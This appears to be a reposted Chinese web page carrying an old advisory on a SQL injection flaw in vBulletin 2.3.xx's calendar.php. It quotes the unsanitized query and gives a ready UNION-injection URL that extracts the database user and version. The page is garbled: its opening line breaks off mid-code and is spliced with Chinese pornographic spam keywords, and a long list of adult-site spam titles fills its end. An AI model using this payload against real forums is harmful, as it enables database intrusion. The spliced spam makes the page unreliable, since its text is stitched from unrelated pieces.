vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit " /> 99久久99,激情四月婷婷,国产欧美一区二区三区久久

一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

vBulletin Forum 2.3.xx SQL Injection

2014-10-22 01:46:01 分類：php技術閱讀()

vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

php技術：vBulletin Forum 2.3.xx SQL Injection，轉載需保留來源！

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。

標簽：

相關文章閱讀

php實現設計模式中的單例模式詳解
PHP實現設計模式中的抽象工廠模式詳解
Linux下安裝oracle客戶端并配置php5.3
五款PHP代碼重構工具推薦

主站蜘蛛池模板：久草社区 | 韩国美女爽快一级毛片黄 | 美女黄免费 | 亚洲午夜大片 | 欧美专区一区二区三区 | 国产成人久久精品 | 亚色在线播放 | 欧美成人网在线综合视频 | 99精品视频在线在线视频观看 | 欧美激情在线精品一区二区 | 狂野欧美性猛交xxxx免费按摩 | 久久久久久88色愉愉 | 欧美特黄特刺激a一级淫片欧美特黄特色aaa大片免费看 | 综合色亚洲 | 国产成人精品一区二区三区 | 久久久网 | 久久精品中文字幕久久 | 91看视频 | 欧美激情性色生活片在线观看 | 午夜视频一区二区三区 | 中文字幕一区二区三区精品 | 四虎永久免费在线 | 天天澡天天摸天天爽免费 | 久久婷婷五综合一区二区 | 亚洲精品亚洲人成人网 | 亚洲一区二区在线成人 | 国产成人免费视频 | 美女免费视频一区二区三区 | 99re6这里只有精品 | 人人狠狠综合久久亚洲婷婷 | 久久综合亚洲 | 久久不射网| www色.com| 亚洲国产精品一区二区三区在线观看 | 四虎影视国产永久免费 | 久久五月天婷婷 | 成年美女黄网站色 | 韩国精品欧美一区二区三区 | 四虎影视国产在线观看精品 | 日本人乱人乱亲乱色视频观看 | 免费成年人在线观看视频 |